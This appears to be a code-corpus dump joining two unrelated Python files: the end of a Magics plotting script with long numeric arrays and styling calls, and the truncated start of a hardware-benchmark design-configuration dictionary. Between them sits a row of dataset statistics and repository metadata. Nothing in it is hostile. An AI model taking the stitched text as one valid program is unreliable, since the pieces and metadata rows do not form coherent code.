5.89893634e+00, 5.86215475e+00, 5.82567020e+00,
5.80193071e+00, 5.79448660e+00, 5.77951050e+00,
5.75573989e+00, 5.72975130e+00, 5.71674077e+00,
5.66802067e+00, 5.61744011e+00, 5.53677779e+00,
5.57041590e+00, 5.56127309e+00, 5.55125436e+00,
5.52645456e+00, 5.51453534e+00, 5.50388348e+00,
5.48459053e+00, 5.49313511e+00, 5.49000531e+00,
5.50051437e+00, 5.46746285e+00, 5.49446540e+00,
5.44069389e+00, 5.36152264e+00, 5.28257040e+00,
5.27229631e+00, 5.27849410e+00, 5.25198772e+00,
5.25459561e+00, 5.26922907e+00, 5.26987824e+00,
5.28113466e+00, 5.28113466e+00, 5.22015086e+00,
5.22015086e+00, 5.20242251e+00, 5.18226141e+00,
5.18131981e+00, 5.12302726e+00, 5.11122376e+00,
5.09870899e+00, 5.06730944e+00, 5.05474859e+00,
5.02750021e+00, 5.05801015e+00, 5.08257235e+00,
5.10463596e+00, 5.09626170e+00, 5.09079398e+00,
5.06090078e+00, 5.06748294e+00, 5.07042240e+00,
5.07964074e+00, 5.06086537e+00, 5.06673794e+00,
5.05809170e+00, 5.05095618e+00, 5.04536999e+00,
5.00142896e+00, 5.03528384e+00, 5.03162830e+00,
5.01007818e+00, 4.99930912e+00, 4.98393586e+00,
4.96995892e+00, 4.97353915e+00, 4.96493874e+00,
4.94562012e+00, 4.91659265e+00, 4.89695909e+00,
4.87465725e+00, 4.84751053e+00, 4.84845680e+00,
4.86694976e+00, 4.82385738e+00, 4.82238185e+00,
4.82171391e+00, 4.84443495e+00, 4.82576678e+00,
4.82731378e+00, 4.80751211e+00, 4.80040529e+00,
4.79724826e+00, 4.72437586e+00, 4.69333183e+00,
4.62879721e+00, 4.66829344e+00, 4.65685614e+00,
4.64001078e+00, 4.58418923e+00, 4.57855376e+00,
4.53387452e+00, 4.54623104e+00, 4.55113630e+00,
4.50058237e+00, 4.51950311e+00, 4.51662854e+00,
4.50776367e+00, 4.47850421e+00, 4.45915911e+00,
4.45378865e+00, 4.46652083e+00, 4.44948686e+00,
4.44433816e+00, 4.47608646e+00, 4.41359831e+00,
4.44079385e+00, 4.42343193e+00, 4.38483656e+00,
4.41651352e+00, 4.39596975e+00, 4.40337560e+00,
4.39674690e+00, 4.39296976e+00, 4.39420262e+00,
4.41633804e+00, 4.38862640e+00, 4.39222514e+00,
4.39122041e+00, 4.35610491e+00, 4.32352962e+00,
4.25909713e+00, 4.25744935e+00, 4.22511637e+00,
4.21577296e+00, 4.20999604e+00, 4.21521846e+00,
4.17254219e+00, 4.11995146e+00, 4.11420709e+00,
4.06678825e+00, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38])) #264
mpp.setc('graph_missing_data_colour','blue')
mpp.seti('graph_symbol_marker_index',18)
mpp.setc('graph_symbol_colour','blue')
mpp.setc('graph_missing_data_style','dot')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','dot')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','evergreen')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
6.72383819e+00, 6.69570758e+00, 6.55133574e+00,
6.55133574e+00, 6.52514368e+00, 6.53261050e+00,
6.52590990e+00, 6.51971370e+00, 6.50032050e+00,
6.49268820e+00, 6.47520913e+00, 6.48478990e+00,
6.51459899e+00, 6.55337063e+00, 6.61759020e+00,
6.59014416e+00, 6.59014416e+00, 6.58274259e+00,
6.58938540e+00, 6.57748686e+00, 6.58375526e+00,
6.56188489e+00, 6.56188489e+00, 6.52469667e+00,
6.54509995e+00, 6.49685822e+00, 6.49685822e+00,
6.50602285e+00, 6.49749952e+00, 6.48286202e+00,
6.46947963e+00, 6.47546652e+00, 6.46284251e+00,
6.51632565e+00, 6.48299057e+00, 6.48299057e+00,
6.45226059e+00, 6.51088832e+00, 6.53056914e+00,
6.59766373e+00, 6.58122329e+00, 6.58837360e+00,
6.57571289e+00, 6.56981735e+00, 6.55209890e+00,
6.50615094e+00, 6.52252507e+00, 6.52252507e+00,
6.52252507e+00, 6.48305484e+00, 6.50333248e+00,
6.42598890e+00, 6.44282547e+00, 6.44282547e+00,
6.45574679e+00, 6.46786930e+00, 6.46213329e+00,
6.44767400e+00, 6.43933226e+00, 6.45794085e+00,
6.44793249e+00, 6.46754719e+00, 6.40774271e+00,
6.49551127e+00, 6.49551127e+00, 6.47411513e+00,
6.48074070e+00, 6.45142103e+00, 6.45716656e+00,
6.46432518e+00, 6.48106216e+00, 6.48106216e+00,
6.35380463e+00, 6.31433554e+00, 6.28556547e+00,
6.14857707e+00, 6.07309641e+00, 6.07309641e+00,
6.02633111e+00, 6.02633111e+00, 6.02017442e+00,
6.00492853e+00, 5.96070466e+00, 5.99186949e+00,
6.07577156e+00, 6.07577156e+00, 6.04710675e+00,
6.09412285e+00, 6.14315337e+00, 6.14315337e+00,
6.18209781e+00, 6.17636625e+00, 6.20114237e+00,
6.19394866e+00, 6.23651879e+00, 6.15907190e+00,
6.13038879e+00, 6.08228301e+00, 6.06389589e+00,
6.03517467e+00, 6.01802847e+00, 6.01061561e+00,
5.98999165e+00, 6.01442710e+00, 6.01442710e+00,
6.08570730e+00, 6.05055094e+00, 5.98804364e+00,
6.01740531e+00, 6.05605757e+00, 6.12263560e+00,
6.08659730e+00, 6.05419964e+00, 6.05419964e+00,
6.05419964e+00, 6.04179885e+00, 6.01636657e+00,
5.94425493e+00, 5.91051323e+00, 5.98337976e+00,
5.92543951e+00, 5.92543951e+00, 5.84729282e+00,
5.83823603e+00, 5.84643766e+00, 5.83894968e+00,
5.83894968e+00, 5.83273806e+00, 5.82651983e+00,
5.87204471e+00, 5.86313599e+00, 5.77242662e+00,
5.78289012e+00, 5.68658709e+00, 5.74028824e+00,
5.72061662e+00, 5.75862989e+00, 5.75049405e+00,
5.70103659e+00, 5.66865384e+00, 5.63608504e+00,
5.56409621e+00, 5.53104873e+00, 5.52207690e+00,
5.47319224e+00, 5.45427967e+00, 5.39251024e+00,
5.40200580e+00, 5.35591573e+00, 5.31805102e+00,
5.41521426e+00, 5.42829288e+00, 5.42829288e+00,
5.44434653e+00, 5.45327258e+00, 5.42443964e+00,
5.44551525e+00, 5.46617699e+00, 5.44518136e+00,
5.42477482e+00, 5.37891506e+00, 5.37891506e+00,
5.27154310e+00, 5.24745970e+00, 5.24745970e+00,
5.25531477e+00, 5.28165063e+00, 5.30879773e+00,
5.28898226e+00, 5.29897789e+00, 5.29897789e+00,
5.31812937e+00, 5.30212222e+00, 5.29496616e+00,
5.30117911e+00, 5.29016383e+00, 5.29016383e+00,
5.25983206e+00, 5.22486044e+00, 5.21552171e+00,
5.23561521e+00, 5.21552171e+00, 5.22549838e+00,
5.16873614e+00, 5.16873614e+00, 5.16155661e+00,
5.14894811e+00, 5.14894811e+00, 5.13695760e+00,
5.13695760e+00, 5.11183268e+00, 5.06639254e+00,
4.97753286e+00, 4.89923463e+00, 4.81828116e+00,
4.80867272e+00, 4.77528359e+00, 4.75298152e+00,
4.73998945e+00, 4.75228015e+00, 4.73409618e+00,
4.72608012e+00, 4.70876842e+00, 4.73761543e+00,
4.73761543e+00, 4.72819557e+00, 4.73796722e+00,
4.70053188e+00, 4.70053188e+00, 4.71540030e+00,
4.72184639e+00, 4.69219210e+00, 4.71053783e+00,
4.66574396e+00, 4.66574396e+00, 4.63644979e+00,
4.63644979e+00, 4.62700407e+00, 4.60715024e+00,
4.61645607e+00, 4.62484234e+00, 4.60968184e+00,
4.62340062e+00, 4.64713173e+00, 4.64713173e+00,
4.65420956e+00, 4.67172345e+00, 4.65313514e+00,
4.68339264e+00, 4.68339264e+00, 4.64623503e+00,
4.67493315e+00, 4.65053760e+00, 4.65796808e+00,
4.63779761e+00, 4.64417197e+00, 4.65743134e+00,
4.65743134e+00, 4.63986350e+00, 4.63986350e+00,
4.60932027e+00, 4.61880215e+00, 4.63716868e+00,
4.58975308e+00, 4.63177432e+00, 4.60986262e+00,
4.60986262e+00, 4.60986262e+00, 4.57766316e+00,
4.56344168e+00, 4.52170690e+00, 4.52170690e+00,
4.47306755e+00, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38])) #264
mpp.setc('graph_missing_data_colour','evergreen')
mpp.seti('graph_symbol_marker_index',2)
mpp.setc('graph_symbol_colour','evergreen')
mpp.setc('graph_missing_data_style','chain_dash')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','chain_dash')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.finalize()
| 73.962243
| 3,735
| 0.615513
| 24,017
| 133,206
| 3.33622
| 0.051922
| 0.023139
| 0.032948
| 0.023363
| 0.839852
| 0.748084
| 0.734393
| 0.701046
| 0.62086
| 0.617889
| 0
| 0.502848
| 0.153867
| 133,206
| 1,800
| 3,736
| 74.003333
| 0.208056
| 0.009354
| 0
| 0.466518
| 0
| 0.001116
| 0.365262
| 0.039514
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.001116
| 0
| 0.001116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
772e425c00d75fd04b6522afd3dda679e78479df
| 24,722
|
py
|
Python
|
auto_framework/design_cfg.py
|
KULeuven-MICAS/PSMA-benchmark
|
94913e3b2b6a1939d7c325384417268566cfdc47
|
[
"Apache-2.0"
] | 1
|
2022-02-15T09:30:07.000Z
|
2022-02-15T09:30:07.000Z
|
auto_framework/design_cfg.py
|
KULeuven-MICAS/PSMA-benchmark
|
94913e3b2b6a1939d7c325384417268566cfdc47
|
[
"Apache-2.0"
] | null | null | null |
auto_framework/design_cfg.py
|
KULeuven-MICAS/PSMA-benchmark
|
94913e3b2b6a1939d7c325384417268566cfdc47
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# Copyright 2021 MICAS, KU LEUVEN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------
# Author: Ehab Ibrahim
# Function: Design configuration dictionary which holds
# RTL parameters for all benchmarked designs
# -----------------------------------------------------
DESIGN_CFG = {"BG_L2_L4_00_L3_00_L2_00_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "00",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_00_L3_00_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "00",
"L2_MODE": "1010",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_00_L3_00_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_00_L3_10_L2_00_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "10",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_00_L3_10_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "10",
"L2_MODE": "1010",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_00_L3_10_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_00_L3_11_L2_00_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "11",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_00_L3_11_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "11",
"L2_MODE": "1010",
"BG": "00",
"DVAFS": "0",
},
"BITFUSION": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "0",
},
#############################################################################
"BG_L2_L4_10_L3_00_L2_00_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "00",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_10_L3_00_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "00",
"L2_MODE": "1010",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_10_L3_00_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_10_L3_10_L2_00_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "10",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_10_L3_10_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "10",
"L2_MODE": "1010",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_10_L3_10_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_10_L3_11_L2_00_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "11",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_10_L3_11_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "11",
"L2_MODE": "1010",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_10_L3_11_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "0",
},
#############################################################################
"BG_L2_L4_11_L3_00_L2_00_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "00",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_11_L3_00_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "00",
"L2_MODE": "1010",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_11_L3_00_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_11_L3_10_L2_00_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "10",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_11_L3_10_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "10",
"L2_MODE": "1010",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_11_L3_10_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_11_L3_11_L2_00_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "11",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_11_L3_11_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "11",
"L2_MODE": "1010",
"BG": "00",
"DVAFS": "0",
},
"BG_L2_L4_11_L3_11_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "0",
},
#############################################################################
#############################################################################
#############################################################################
"BG_L2_L4_00_L3_00_L2_00_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "00",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_00_L3_00_L2_11_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_00_L3_10_L2_00_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "10",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_00_L3_10_L2_11_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_00_L3_11_L2_00_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "11",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_00_L3_11_L2_11_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "1",
},
#############################################################################
"BG_L2_L4_10_L3_00_L2_00_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "00",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_10_L3_00_L2_11_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_10_L3_10_L2_00_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "10",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_10_L3_10_L2_11_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_10_L3_11_L2_00_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "11",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_10_L3_11_L2_11_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "1",
},
#############################################################################
"BG_L2_L4_11_L3_00_L2_00_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "00",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_11_L3_00_L2_11_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_11_L3_10_L2_00_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "10",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_11_L3_10_L2_11_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_11_L3_11_L2_00_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "11",
"L2_MODE": "0000",
"BG": "00",
"DVAFS": "1",
},
"BG_L2_L4_11_L3_11_L2_11_DVAFS_1": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "00",
"DVAFS": "1",
},
#############################################################################
#############################################################################
#############################################################################
"BG_L3_L4_00_L3_00_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "00",
"L2_MODE": "1010",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_00_L3_10_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "10",
"L2_MODE": "1010",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_00_L3_11_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "11",
"L2_MODE": "1010",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_00_L3_00_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_00_L3_10_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "01",
"DVAFS": "0",
},
"BITBLADE": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "00",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "01",
"DVAFS": "0",
},
#############################################################################
"BG_L3_L4_10_L3_00_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "00",
"L2_MODE": "1010",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_10_L3_10_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "10",
"L2_MODE": "1010",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_10_L3_11_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "11",
"L2_MODE": "1010",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_10_L3_00_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "00",
"L2_MODE": "1111",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_10_L3_10_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "10",
"L2_MODE": "1111",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_10_L3_11_L2_11_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "10",
"L3_MODE": "11",
"L2_MODE": "1111",
"BG": "01",
"DVAFS": "0",
},
#############################################################################
"BG_L3_L4_11_L3_00_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "00",
"L2_MODE": "1010",
"BG": "01",
"DVAFS": "0",
},
"BG_L3_L4_11_L3_10_L2_10_DVAFS_0": {
"SDC_MODE": "L4_prec_only",
"L4_MODE": "11",
"L3_MODE": "10",
"L2_MODE": "1010",
